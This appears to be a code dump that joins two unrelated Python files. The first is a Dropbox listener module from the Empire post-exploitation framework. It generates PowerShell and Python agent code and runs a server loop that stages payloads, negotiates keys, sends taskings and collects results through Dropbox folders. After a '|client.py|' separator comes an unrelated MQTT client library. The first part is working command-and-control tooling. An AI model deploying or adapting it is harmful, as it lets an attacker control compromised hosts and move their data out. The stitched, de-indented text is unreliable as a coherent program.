$"""+helpers.generate_random_script_var_name("wc")+"""2.Headers.Add("Authorization", "Bearer $($Script:APIToken)")
$"""+helpers.generate_random_script_var_name("wc")+"""2.Headers.Add("Content-Type", "application/octet-stream")
$"""+helpers.generate_random_script_var_name("wc")+"""2.Headers.Add("Dropbox-API-Arg", "{`"path`":`"$ResultsFolder/$($script:SessionID).txt`"}");
$Null = $"""+helpers.generate_random_script_var_name("wc")+"""2.UploadData("https://content.dropboxapi.com/2/files/upload", "POST", $RoutingPacket)
$script:MissedCheckins = 0
}
catch {
if ($_ -match 'Unable to connect') {
$script:MissedCheckins += 1
}
}
}
}
""" % (resultsFolder)
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
def post_message(uri, data, headers):
req = urllib2.Request(uri)
headers['Authorization'] = "Bearer REPLACE_API_TOKEN"
for key, value in headers.iteritems():
req.add_header("%s"%(key),"%s"%(value))
if data:
req.add_data(data)
o=urllib2.build_opener()
o.add_handler(urllib2.ProxyHandler(urllib2.getproxies()))
urllib2.install_opener(o)
return urllib2.urlopen(req).read()
global missedCheckins
global headers
taskingsFolder="REPLACE_TASKSING_FOLDER"
resultsFolder="REPLACE_RESULTS_FOLDER"
data = None
requestUri=''
try:
del headers['Content-Type']
except:
pass
if packets:
data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
#check to see if there are any results already present
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (resultsFolder, sessionID)
try:
pkdata = post_message('https://content.dropboxapi.com/2/files/download', data=None, headers=headers)
except:
pkdata = None
if pkdata and len(pkdata) > 0:
data = pkdata + data
headers['Content-Type'] = "application/octet-stream"
requestUri = 'https://content.dropboxapi.com/2/files/upload'
else:
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (taskingsFolder, sessionID)
requestUri='https://content.dropboxapi.com/2/files/download'
try:
resultdata = post_message(requestUri, data, headers)
if (resultdata and len(resultdata) > 0) and requestUri.endswith('download'):
headers['Content-Type'] = "application/json"
del headers['Dropbox-API-Arg']
datastring="{\\"path\\":\\"%s/%s.txt\\"}" % (taskingsFolder, sessionID)
nothing = post_message('https://api.dropboxapi.com/2/files/delete', datastring, headers)
return ('200', resultdata)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
sendMessage = sendMessage.replace('REPLACE_TASKSING_FOLDER', taskingsFolder)
sendMessage = sendMessage.replace('REPLACE_RESULTS_FOLDER', resultsFolder)
sendMessage = sendMessage.replace('REPLACE_API_TOKEN', apiToken)
return sendMessage
else:
print helpers.color('[!] listeners/dbx generate_comms(): no language specified!')
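# A hedged sketch (Python 3 stdlib, illustrative only) of the two Dropbox content-API
# requests the generated comms code issues; <token>, <folder> and <id> are placeholders:
#   import json, urllib.request
#   def dbx_call(url, token, path, data=None, extra=None):
#       headers = {'Authorization': 'Bearer %s' % token,
#                  'Dropbox-API-Arg': json.dumps({'path': path})}
#       headers.update(extra or {})
#       req = urllib.request.Request(url, data=data, headers=headers)
#       return urllib.request.urlopen(req).read()
#   # fetch a tasking from <taskingsFolder>/<sessionID>.txt
#   tasking = dbx_call('https://content.dropboxapi.com/2/files/download', '<token>', '/<folder>/<id>.txt')
#   # upload an RC4 routing packet to the results folder
#   dbx_call('https://content.dropboxapi.com/2/files/upload', '<token>', '/<folder>/<id>.txt',
#            data=b'<routing packet>', extra={'Content-Type': 'application/octet-stream'})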
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up polling server for Dropbox
polling communication.
./Empire/
./staging/
stager.ps1
SESSION_[1-4].txt
./taskings/
SESSIONID.txt
./results/
SESSIONID.txt
/Empire/staging/stager.ps1 -> RC4staging(stager.ps1) uploaded by server
/Empire/staging/sessionID_1.txt -> AESstaging(PublicKey) uploaded by client
/Empire/staging/sessionID_2.txt -> RSA(nonce+AESsession) uploaded by server
/Empire/staging/sessionID_3.txt -> AESsession(nonce+sysinfo) uploaded by client
/Empire/staging/sessionID_4.txt -> AESsession(agent.ps1) uploaded by server
client dropbox server
<- upload /Empire/staging/stager.ps1
read /Empire/staging/stager ->
<- return stager
generate sessionID
upload /Empire/staging/sessionID_1.txt ->
<- read /Empire/staging/sessionID_1.txt
<- upload /Empire/staging/sessionID_2.txt
read /Empire/staging/sessionID_2.txt ->
<- /Empire/staging/sessionID_2.txt
upload /Empire/staging/sessionID_3.txt ->
<- read /Empire/staging/sessionID_3.txt
<- upload /Empire/staging/sessionID_4.txt
read /Empire/staging/sessionID_4.txt ->
<- /Empire/staging/sessionID_4.txt
<start beaconing>
<- upload /Empire/taskings/sessionID.txt
read /Empire/taskings/sessionID.txt ->
<- /Empire/taskings/sessionID.txt
delete /Empire/taskings/sessionID.txt ->
execute code
upload /Empire/results/sessionID.txt ->
<- read /Empire/results/sessionID.txt
<- delete /Empire/results/sessionID.txt
"""
def download_file(dbx, path):
# helper to download a file at the given path
try:
md, res = dbx.files_download(path)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error downloading data from '{}' : {}".format(path, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
return None
return res.content
def upload_file(dbx, path, data):
# helper to upload a file to the given path
try:
dbx.files_upload(data, path)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading data to '{}'".format(path)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
def delete_file(dbx, path):
# helper to delete a file at the given path
try:
dbx.files_delete(path)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(path)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
stagingKey = listenerOptions['StagingKey']['Value']
pollInterval = listenerOptions['PollInterval']['Value']
apiToken = listenerOptions['APIToken']['Value']
listenerName = listenerOptions['Name']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
stagingFolder = "/%s/%s" % (baseFolder, listenerOptions['StagingFolder']['Value'].strip('/'))
taskingsFolder = "/%s/%s" % (baseFolder, listenerOptions['TaskingsFolder']['Value'].strip('/'))
resultsFolder = "/%s/%s" % (baseFolder, listenerOptions['ResultsFolder']['Value'].strip('/'))
dbx = dropbox.Dropbox(apiToken)
# ensure that the access token supplied is valid
try:
dbx.users_get_current_account()
except dropbox.exceptions.AuthError as err:
print helpers.color("[!] ERROR: Invalid access token; try re-generating an access token from the app console on the web.")
return False
# setup the base folder structure we need
try:
dbx.files_create_folder(stagingFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[*] Dropbox folder '{}' already exists".format(stagingFolder)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_create_folder(taskingsFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[*] Dropbox folder '{}' already exists".format(taskingsFolder)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_create_folder(resultsFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[*] Dropbox folder '{}' already exists".format(resultsFolder)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# upload the stager.ps1 code
stagerCodeps = self.generate_stager(listenerOptions=listenerOptions, language='powershell')
stagerCodepy = self.generate_stager(listenerOptions=listenerOptions, language='python')
try:
# delete stager if it exists
delete_file(dbx, "%s/debugps" % (stagingFolder))
delete_file(dbx, "%s/debugpy" % (stagingFolder))
dbx.files_upload(stagerCodeps, "%s/debugps" % (stagingFolder))
dbx.files_upload(stagerCodepy, "%s/debugpy" % (stagingFolder))
except dropbox.exceptions.ApiError:
print helpers.color("[!] Error uploading stager to '%s/stager'" % (stagingFolder))
return
while True:
time.sleep(int(pollInterval))
# search for anything in /Empire/staging/*
for match in dbx.files_search(stagingFolder, "*.txt").matches:
fileName = str(match.metadata.path_display)
relName = fileName.split('/')[-1][:-4]
if '_' in relName:
    sessionID, stage = relName.split('_')
    sessionID = sessionID.upper()
if stage == '1':
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error downloading data from '{}' : {}".format(fileName, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
continue
stageData = res.content
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, stageData, listenerOptions)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
# TODO: more error checking
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
stageName = "%s/%s_2.txt" % (stagingFolder, sessionID)
listenerName = self.options['Name']['Value']
message = "[*] Uploading key negotiation part 2 to {} for {}".format(stageName, sessionID)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
dbx.files_upload(results, stageName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading data to '{}'".format(stageName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
if stage == '3':
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error downloading data from '{}' : {}".format(fileName, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
continue
stageData = res.content
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, stageData, listenerOptions)
if dataResults and len(dataResults) > 0:
# print "dataResults:",dataResults
for (language, results) in dataResults:
if results.startswith('STAGE2'):
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} through Dropbox".format(sessionID)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
fileName2 = fileName.replace("%s_3.txt" % (sessionID), "%s_2.txt" % (sessionID))
dbx.files_delete(fileName2)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName2)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions)
returnResults = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
try:
stageName = "%s/%s_4.txt" % (stagingFolder, sessionID)
listenerName = self.options['Name']['Value']
message = "[*] Uploading key negotiation part 4 (agent) to {} for {}".format(stageName, sessionID)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
dbx.files_upload(returnResults, stageName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading data to '{}'".format(stageName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# get any taskings applicable for agents linked to this listener
sessionIDs = self.mainMenu.agents.get_agents_for_listener(listenerName)
for sessionID in sessionIDs:
taskingData = self.mainMenu.agents.handle_agent_request(sessionID, 'powershell', stagingKey)
if taskingData:
try:
taskingFile = "%s/%s.txt" % (taskingsFolder, sessionID)
# if the tasking file still exists, download/append + upload again
existingData = None
try:
md, res = dbx.files_download(taskingFile)
existingData = res.content
except:
existingData = None
if existingData:
taskingData = taskingData + existingData
listenerName = self.options['Name']['Value']
message = "[*] Uploading agent tasks for {} to {}".format(sessionID, taskingFile)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
dbx.files_upload(taskingData, taskingFile, mode=dropbox.files.WriteMode.overwrite)
except dropbox.exceptions.ApiError as e:
listenerName = self.options['Name']['Value']
message = "[!] Error uploading agent tasks for {} to {} : {}".format(sessionID, taskingFile, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# check for any results returned
for match in dbx.files_search(resultsFolder, "*.txt").matches:
fileName = str(match.metadata.path_display)
sessionID = fileName.split('/')[-1][:-4]
listenerName = self.options['Name']['Value']
message = "[*] Downloading data for '{}' from {}".format(sessionID, fileName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options['Name']['Value']
message = "[!] Error download data from '{}' : {}".format(fileName, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
continue
responseData = res.content
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
self.mainMenu.agents.handle_agent_data(stagingKey, responseData, listenerOptions)
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
|
client.py
|
# Copyright (c) 2012-2014 Roger Light <roger@atchoo.org>
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# and Eclipse Distribution License v1.0 which accompany this distribution.
#
# The Eclipse Public License is available at
# http://www.eclipse.org/legal/epl-v10.html
# and the Eclipse Distribution License is available at
# http://www.eclipse.org/org/documents/edl-v10.php.
#
# Contributors:
# Roger Light - initial API and implementation
"""
This is an MQTT v3.1 client module. MQTT is a lightweight pub/sub messaging
protocol that is easy to implement and suitable for low powered devices.
"""
import errno
import platform
import random
import select
import socket
HAVE_SSL = True
try:
import ssl
cert_reqs = ssl.CERT_REQUIRED
tls_version = ssl.PROTOCOL_TLSv1
except:
HAVE_SSL = False
cert_reqs = None
tls_version = None
import struct
import sys
import threading
import time
HAVE_DNS = True
try:
import dns.resolver
except ImportError:
HAVE_DNS = False
if platform.system() == 'Windows':
EAGAIN = errno.WSAEWOULDBLOCK
else:
EAGAIN = errno.EAGAIN
# AWS WSS implementation
import AWSIoTPythonSDK.core.protocol.paho.securedWebsocket.securedWebsocketCore as wssCore
import AWSIoTPythonSDK.core.util.progressiveBackoffCore as backoffCore
import AWSIoTPythonSDK.core.util.offlinePublishQueue as offlinePublishQueue
VERSION_MAJOR=1
VERSION_MINOR=0
VERSION_REVISION=0
VERSION_NUMBER=(VERSION_MAJOR*1000000+VERSION_MINOR*1000+VERSION_REVISION)
MQTTv31 = 3
MQTTv311 = 4
if sys.version_info[0] < 3:
PROTOCOL_NAMEv31 = "MQIsdp"
PROTOCOL_NAMEv311 = "MQTT"
else:
PROTOCOL_NAMEv31 = b"MQIsdp"
PROTOCOL_NAMEv311 = b"MQTT"
PROTOCOL_VERSION = 3
# Message types
CONNECT = 0x10
CONNACK = 0x20
PUBLISH = 0x30
PUBACK = 0x40
PUBREC = 0x50
PUBREL = 0x60
PUBCOMP = 0x70
SUBSCRIBE = 0x80
SUBACK = 0x90
UNSUBSCRIBE = 0xA0
UNSUBACK = 0xB0
PINGREQ = 0xC0
PINGRESP = 0xD0
DISCONNECT = 0xE0
# Log levels
MQTT_LOG_INFO = 0x01
MQTT_LOG_NOTICE = 0x02
MQTT_LOG_WARNING = 0x04
MQTT_LOG_ERR = 0x08
MQTT_LOG_DEBUG = 0x10
# CONNACK codes
CONNACK_ACCEPTED = 0
CONNACK_REFUSED_PROTOCOL_VERSION = 1
CONNACK_REFUSED_IDENTIFIER_REJECTED = 2
CONNACK_REFUSED_SERVER_UNAVAILABLE = 3
CONNACK_REFUSED_BAD_USERNAME_PASSWORD = 4
CONNACK_REFUSED_NOT_AUTHORIZED = 5
# Connection state
mqtt_cs_new = 0
mqtt_cs_connected = 1
mqtt_cs_disconnecting = 2
mqtt_cs_connect_async = 3
# Message state
mqtt_ms_invalid = 0
mqtt_ms_publish= 1
mqtt_ms_wait_for_puback = 2
mqtt_ms_wait_for_pubrec = 3
mqtt_ms_resend_pubrel = 4
mqtt_ms_wait_for_pubrel = 5
mqtt_ms_resend_pubcomp = 6
mqtt_ms_wait_for_pubcomp = 7
mqtt_ms_send_pubrec = 8
mqtt_ms_queued = 9
# Error values
MQTT_ERR_AGAIN = -1
MQTT_ERR_SUCCESS = 0
MQTT_ERR_NOMEM = 1
MQTT_ERR_PROTOCOL = 2
MQTT_ERR_INVAL = 3
MQTT_ERR_NO_CONN = 4
MQTT_ERR_CONN_REFUSED = 5
MQTT_ERR_NOT_FOUND = 6
MQTT_ERR_CONN_LOST = 7
MQTT_ERR_TLS = 8
MQTT_ERR_PAYLOAD_SIZE = 9
MQTT_ERR_NOT_SUPPORTED = 10
MQTT_ERR_AUTH = 11
MQTT_ERR_ACL_DENIED = 12
MQTT_ERR_UNKNOWN = 13
MQTT_ERR_ERRNO = 14
# MessageQueueing DropBehavior
MSG_QUEUEING_DROP_OLDEST = 0
MSG_QUEUEING_DROP_NEWEST = 1
if sys.version_info[0] < 3:
sockpair_data = "0"
else:
sockpair_data = b"0"
def error_string(mqtt_errno):
"""Return the error string associated with an mqtt error number."""
if mqtt_errno == MQTT_ERR_SUCCESS:
return "No error."
elif mqtt_errno == MQTT_ERR_NOMEM:
return "Out of memory."
elif mqtt_errno == MQTT_ERR_PROTOCOL:
return "A network protocol error occurred when communicating with the broker."
elif mqtt_errno == MQTT_ERR_INVAL:
return "Invalid function arguments provided."
elif mqtt_errno == MQTT_ERR_NO_CONN:
return "The client is not currently connected."
elif mqtt_errno == MQTT_ERR_CONN_REFUSED:
return "The connection was refused."
elif mqtt_errno == MQTT_ERR_NOT_FOUND:
return "Message not found (internal error)."
elif mqtt_errno == MQTT_ERR_CONN_LOST:
return "The connection was lost."
elif mqtt_errno == MQTT_ERR_TLS:
return "A TLS error occurred."
elif mqtt_errno == MQTT_ERR_PAYLOAD_SIZE:
return "Payload too large."
elif mqtt_errno == MQTT_ERR_NOT_SUPPORTED:
return "This feature is not supported."
elif mqtt_errno == MQTT_ERR_AUTH:
return "Authorisation failed."
elif mqtt_errno == MQTT_ERR_ACL_DENIED:
return "Access denied by ACL."
elif mqtt_errno == MQTT_ERR_UNKNOWN:
return "Unknown error."
elif mqtt_errno == MQTT_ERR_ERRNO:
return "Error defined by errno."
else:
return "Unknown error."
def connack_string(connack_code):
"""Return the string associated with a CONNACK result."""
if connack_code == 0:
return "Connection Accepted."
elif connack_code == 1:
return "Connection Refused: unacceptable protocol version."
elif connack_code == 2:
return "Connection Refused: identifier rejected."
elif connack_code == 3:
return "Connection Refused: broker unavailable."
elif connack_code == 4:
return "Connection Refused: bad user name or password."
elif connack_code == 5:
return "Connection Refused: not authorised."
else:
return "Connection Refused: unknown reason."
def topic_matches_sub(sub, topic):
"""Check whether a topic matches a subscription.
For example:
foo/bar would match the subscription foo/# or +/bar
non/matching would not match the subscription non/+/+
"""
result = True
multilevel_wildcard = False
slen = len(sub)
tlen = len(topic)
if slen > 0 and tlen > 0:
if (sub[0] == '$' and topic[0] != '$') or (topic[0] == '$' and sub[0] != '$'):
return False
spos = 0
tpos = 0
while spos < slen and tpos < tlen:
if sub[spos] == topic[tpos]:
if tpos == tlen-1:
# Check for e.g. foo matching foo/#
if spos == slen-3 and sub[spos+1] == '/' and sub[spos+2] == '#':
result = True
multilevel_wildcard = True
break
spos += 1
tpos += 1
if tpos == tlen and spos == slen-1 and sub[spos] == '+':
spos += 1
result = True
break
else:
if sub[spos] == '+':
spos += 1
while tpos < tlen and topic[tpos] != '/':
tpos += 1
if tpos == tlen and spos == slen:
result = True
break
elif sub[spos] == '#':
multilevel_wildcard = True
if spos+1 != slen:
result = False
break
else:
result = True
break
else:
result = False
break
if not multilevel_wildcard and (tpos < tlen or spos < slen):
result = False
return result
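# Illustrative examples (not executed) matching the rules in the docstring above:
#   topic_matches_sub('foo/#', 'foo/bar')         # True  - multilevel wildcard
#   topic_matches_sub('+/bar', 'foo/bar')         # True  - single-level wildcard
#   topic_matches_sub('non/+/+', 'non/matching')  # False - level counts differ
#   topic_matches_sub('$SYS/#', 'foo/bar')        # False - '$' topics need '$' subscriptions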
def _socketpair_compat():
"""TCP/IP socketpair including Windows support"""
listensock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
listensock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listensock.bind(("127.0.0.1", 0))
listensock.listen(1)
iface, port = listensock.getsockname()
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
sock1.setblocking(0)
try:
sock1.connect(("127.0.0.1", port))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
sock2, address = listensock.accept()
sock2.setblocking(0)
listensock.close()
return (sock1, sock2)
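# Note: this emulates socket.socketpair() over a loopback TCP connection because AF_UNIX
# socket pairs are unavailable on Windows (socket.socketpair() itself only gained Windows
# support in later Python 3 releases); the resulting pair gives other threads a way to
# interrupt the client's blocking select() by writing a byte to one end.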
class MQTTMessage:
""" This is a class that describes an incoming message. It is passed to the
on_message callback as the message parameter.
Members:
topic : String. topic that the message was published on.
payload : String/bytes the message payload.
qos : Integer. The message Quality of Service 0, 1 or 2.
retain : Boolean. If true, the message is a retained message and not fresh.
mid : Integer. The message id.
"""
def __init__(self):
self.timestamp = 0
self.state = mqtt_ms_invalid
self.dup = False
self.mid = 0
self.topic = ""
self.payload = None
self.qos = 0
self.retain = False
class Client(object):
"""MQTT version 3.1/3.1.1 client class.
This is the main class for use communicating with an MQTT broker.
General usage flow:
* Use connect()/connect_async() to connect to a broker
* Call loop() frequently to maintain network traffic flow with the broker
* Or use loop_start() to set a thread running to call loop() for you.
* Or use loop_forever() to handle calling loop() for you in a blocking
* function.
* Use subscribe() to subscribe to a topic and receive messages
* Use publish() to send messages
* Use disconnect() to disconnect from the broker
Data returned from the broker is made available with the use of callback
functions as described below.
Callbacks
=========
A number of callback functions are available to receive data back from the
broker. To use a callback, define a function and then assign it to the
client:
def on_connect(client, userdata, flags, rc):
print("Connection returned " + str(rc))
client.on_connect = on_connect
All of the callbacks as described below have a "client" and an "userdata"
argument. "client" is the Client instance that is calling the callback.
"userdata" is user data of any type and can be set when creating a new client
instance or with user_data_set(userdata).
The callbacks:
on_connect(client, userdata, flags, rc): called when the broker responds to our connection
request.
flags is a dict that contains response flags from the broker:
flags['session present'] - this flag is useful for clients that are
using clean session set to 0 only. If a client with clean
session=0, that reconnects to a broker that it has previously
connected to, this flag indicates whether the broker still has the
session information for the client. If 1, the session still exists.
The value of rc determines success or not:
0: Connection successful
1: Connection refused - incorrect protocol version
2: Connection refused - invalid client identifier
3: Connection refused - server unavailable
4: Connection refused - bad username or password
5: Connection refused - not authorised
6-255: Currently unused.
on_disconnect(client, userdata, rc): called when the client disconnects from the broker.
The rc parameter indicates the disconnection state. If MQTT_ERR_SUCCESS
(0), the callback was called in response to a disconnect() call. If any
other value the disconnection was unexpected, such as might be caused by
a network error.
on_message(client, userdata, message): called when a message has been received on a
topic that the client subscribes to. The message variable is a
MQTTMessage that describes all of the message parameters.
on_publish(client, userdata, mid): called when a message that was to be sent using the
publish() call has completed transmission to the broker. For messages
with QoS levels 1 and 2, this means that the appropriate handshakes have
completed. For QoS 0, this simply means that the message has left the
client. The mid variable matches the mid variable returned from the
corresponding publish() call, to allow outgoing messages to be tracked.
This callback is important because even if the publish() call returns
success, it does not always mean that the message has been sent.
on_subscribe(client, userdata, mid, granted_qos): called when the broker responds to a
subscribe request. The mid variable matches the mid variable returned
from the corresponding subscribe() call. The granted_qos variable is a
list of integers that give the QoS level the broker has granted for each
of the different subscription requests.
on_unsubscribe(client, userdata, mid): called when the broker responds to an unsubscribe
request. The mid variable matches the mid variable returned from the
corresponding unsubscribe() call.
on_log(client, userdata, level, buf): called when the client has log information. Define
to allow debugging. The level variable gives the severity of the message
and will be one of MQTT_LOG_INFO, MQTT_LOG_NOTICE, MQTT_LOG_WARNING,
MQTT_LOG_ERR, and MQTT_LOG_DEBUG. The message itself is in buf.
"""
def __init__(self, client_id="", clean_session=True, userdata=None, protocol=MQTTv31, useSecuredWebsocket=False):
"""client_id is the unique client id string used when connecting to the
broker. If client_id is zero length or None, then one will be randomly
generated. In this case, clean_session must be True. If this is not the
case a ValueError will be raised.
clean_session is a boolean that determines the client type. If True,
the broker will remove all information about this client when it
disconnects. If False, the client is a persistent client and
subscription information and queued messages will be retained when the
client disconnects.
Note that a client will never discard its own outgoing messages on
disconnect. Calling connect() or reconnect() will cause the messages to
be resent. Use reinitialise() to reset a client to its original state.
userdata is user defined data of any type that is passed as the "userdata"
parameter to callbacks. It may be updated at a later point with the
user_data_set() function.
The protocol argument allows explicit setting of the MQTT version to
use for this client. Can be paho.mqtt.client.MQTTv311 (v3.1.1) or
paho.mqtt.client.MQTTv31 (v3.1), with the default being v3.1. If the
broker reports that the client connected with an invalid protocol
version, the client will automatically attempt to reconnect using v3.1
instead.
        useSecuredWebsocket is a boolean that determines whether the client
        uses MQTT over Websocket with sigV4 signing (True) or MQTT over a
        plain TCP socket (False). If True, the client will try to find
        AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY in the system environment
        variables and use them for the sigV4 signing and Websocket handshake.
        Under this configuration, all outbound MQTT packets will be wrapped
        in Websocket framing and all inbound MQTT packets will be
        automatically wss-decoded.
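        Example (illustrative sketch, not part of the original API docs;
        assumes this class is exposed under the name Client, as in
        paho.mqtt.client):
            mqttc = Client(client_id="example-client", clean_session=True,
                           protocol=MQTTv311)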
"""
if not clean_session and (client_id == "" or client_id is None):
raise ValueError('A client id must be provided if clean session is False.')
self._protocol = protocol
self._userdata = userdata
self._sock = None
self._sockpairR, self._sockpairW = _socketpair_compat()
self._keepalive = 60
self._message_retry = 20
self._last_retry_check = 0
self._clean_session = clean_session
if client_id == "" or client_id is None:
self._client_id = "paho/" + "".join(random.choice("0123456789ADCDEF") for x in range(23-5))
else:
self._client_id = client_id
self._username = ""
self._password = ""
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet = []
self._current_out_packet = None
self._last_msg_in = time.time()
self._last_msg_out = time.time()
self._ping_t = 0
self._last_mid = 0
self._state = mqtt_cs_new
self._max_inflight_messages = 20
self._out_messages = []
self._in_messages = []
self._inflight_messages = 0
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
self.on_disconnect = None
self.on_connect = None
self.on_publish = None
self.on_message = None
self.on_message_filtered = []
self.on_subscribe = None
self.on_unsubscribe = None
self.on_log = None
self._host = ""
self._port = 1883
self._bind_address = ""
self._in_callback = False
self._strict_protocol = False
self._callback_mutex = threading.Lock()
self._state_mutex = threading.Lock()
self._out_packet_mutex = threading.Lock()
self._current_out_packet_mutex = threading.Lock()
self._msgtime_mutex = threading.Lock()
self._out_message_mutex = threading.Lock()
self._in_message_mutex = threading.Lock()
self._thread = None
self._thread_terminate = False
self._ssl = None
self._tls_certfile = None
self._tls_keyfile = None
self._tls_ca_certs = None
self._tls_cert_reqs = None
self._tls_ciphers = None
self._tls_version = tls_version
self._tls_insecure = False
self._useSecuredWebsocket = useSecuredWebsocket # Do we enable secured websocket
self._backoffCore = backoffCore.progressiveBackoffCore() # Init the backoffCore using default configuration
self._AWSAccessKeyIDCustomConfig = ""
self._AWSSecretAccessKeyCustomConfig = ""
self._AWSSessionTokenCustomConfig = ""
def __del__(self):
pass
